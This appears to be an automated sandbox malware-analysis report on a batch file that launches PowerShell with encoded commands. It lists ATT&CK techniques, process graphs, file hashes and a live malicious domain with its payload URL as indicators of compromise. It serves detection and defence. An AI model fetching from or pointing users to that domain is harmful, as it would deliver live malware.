Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts2
Command and Scripting Interpreter
1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1670572 Sample: malicious.bat Startdate: 21/04/2025 Architecture: WINDOWS Score: 60 25 qqcxq1.dyheg.fun 2->25 29 Antivirus detection for URL or domain 2->29 31 Sigma detected: Suspicious PowerShell Parameter Substring 2->31 33 Joe Sandbox ML detected suspicious sample 2->33 10 cmd.exe 1 2->10         started        signatures3 process4 signatures5 35 Encrypted powershell cmdline option found 10->35 13 powershell.exe 9 10->13         started        16 conhost.exe 10->16         started        process6 signatures7 37 Encrypted powershell cmdline option found 13->37 18 powershell.exe 19 13->18         started        process8 process9 20 powershell.exe 15 20 18->20         started        dnsIp10 27 qqcxq1.dyheg.fun 172.67.212.124, 443, 49747 CLOUDFLARENETUS United States 20->27 23 conhost.exe 20->23         started        process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SAMPLE100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt100%Avira URL Cloudmalware
https://qqcxq1.dyheg.fun100%Avira URL Cloudmalware
https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca100%Avira URL Cloudmalware
https://qqcxq1.dyheg.fun/7721100%Avira URL Cloudmalware
https://qqcxq1.dyh0%Avira URL Cloudsafe
https://oneget.org0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
qqcxq1.dyheg.fun
172.67.212.124
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdttrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://pesterbdd.com/images/Pester.png4powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.64957011856.0000018635196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.00000186425D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.0000018642753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.64957011856.0000018634C58000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaecapowershell.exe, 00000005.00000002.65025060540.0000000008805000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://go.micropowershell.exe, 00000004.00000002.64957011856.000001863375E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://github.com/Pester/Pester4powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.64978795934.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Pester/Pesterhpowershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.64957011856.0000018635196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.00000186425D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.0000018642753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.00000000053EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.quovadis.bm0powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Pester/PesterXzpowershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://qqcxq1.dyhpowershell.exe, 00000004.00000002.64957011856.0000018633C55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.65025026617.0000029080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.0000018632471000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://qqcxq1.dyheg.fun/7721powershell.exe, 00000004.00000002.64957011856.0000018633C55000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.65025026617.0000029080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.0000018632471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://oneget.orgpowershell.exe, 00000004.00000002.64957011856.0000018634C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://qqcxq1.dyheg.funpowershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  172.67.212.124
                                                  qqcxq1.dyheg.funUnited States
                                                  13335CLOUDFLARENETUStrue
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1670572
                                                  Start date and time:2025-04-21 21:57:28 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 4m 34s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:malicious.bat
                                                  Detection:MAL
                                                  Classification:mal60.evad.winBAT@9/10@1/1
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 12
                                                  • Number of non-executed functions: 1
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .bat
                                                  • Stop behavior analysis, all processes terminated
                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • Execution Graph export aborted for target powershell.exe, PID 4296 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 7232 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  TimeTypeDescription
                                                  15:59:37API Interceptor23x Sleep call for process: powershell.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  172.67.212.124Paystub_#38920011_2023-09-14T143803.htm_Get hashmaliciousUnknownBrowse
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUShttps://cpcontacts.diercusn.com/Downloads/test.pdf.lnkGet hashmaliciousUnknownBrowse
                                                    • 104.21.80.1
                                                    STATEMENT COMPLETED_DOCUMENT.rtfGet hashmaliciousUnknownBrowse
                                                    • 104.16.123.96
                                                    STATEMENT COMPLETED_DOCUMENT.rtfGet hashmaliciousUnknownBrowse
                                                    • 104.16.123.96
                                                    https://protect-usb.mimecast.com/s/gAmYCyp4MQUKnmErfZfJcx9wipGet hashmaliciousUnknownBrowse
                                                    • 1.1.1.1
                                                    https://statment-two.vercel.app/doc/statements_9909876.pdf.exeGet hashmaliciousUnknownBrowse
                                                    • 104.26.0.188
                                                    http://dashes.cc/srv/logGet hashmaliciousUnknownBrowse
                                                    • 104.21.6.12
                                                    phish_alert_iocp_v1.4.48 (67).emlGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    http://vertequipment.comGet hashmaliciousUnknownBrowse
                                                    • 172.67.173.199
                                                    Signature Required(3 pages).pdfGet hashmaliciousGabagoolBrowse
                                                    • 172.67.69.226
                                                    SWIFT_MT103_USD45800.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.50.77
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0ePayment reciept.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                    • 172.67.212.124
                                                    BEPZA MT103 Credit.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                    • 172.67.212.124
                                                    SecuriteInfo.com.Trojan.Mardom.PN.11.17656.13789.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                    • 172.67.212.124
                                                    tos.js.ps1Get hashmaliciousUnknownBrowse
                                                    • 172.67.212.124
                                                    3453 invoice&packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.212.124
                                                    SecuriteInfo.com.suspected.of.Trojan.MSIL.MAComb.Heur.7895.12523.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.212.124
                                                    SecuriteInfo.com.suspected.of.Trojan.MSIL.MAComb.Heur.7895.12523.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.212.124
                                                    SecuriteInfo.com.BackDoor.SiggenNET.71.1887.20790.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.212.124
                                                    SecuriteInfo.com.Trojan.MulDrop30.46617.18825.26126.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                    • 172.67.212.124
                                                    SecuriteInfo.com.Win64.MalwareX-gen.5286.9423.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.212.124
                                                    No context
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:@...e...........................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (27124), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):55002
                                                    Entropy (8bit):3.940847564880843
                                                    Encrypted:false
                                                    SSDEEP:192:BSECjfdIkoNEfc5HXCgo7/l707A5CpgSECjfdIkoNEfc5HXCgo7/l707A5CpXC:kBdCBdgC
                                                    MD5:6522D2110967B09CD9EF57E59DF872FA
                                                    SHA1:CF8DE0EBC5903D7C127A61506E103B0B6497BB4D
                                                    SHA-256:78DA86489D1C637E83E99386C5888B3F5EE5F6871DEC7DA3898BE15C0E906B23
                                                    SHA-512:54316CD473762340C46539CD272A1E6BA9F49092DDD4C66367F1A609FE8E8072DC5D9B4F3E182AAD79413CB141741D12A4DCDEBAD9F98FD3ED95C8D77D10461F
                                                    Malicious:false
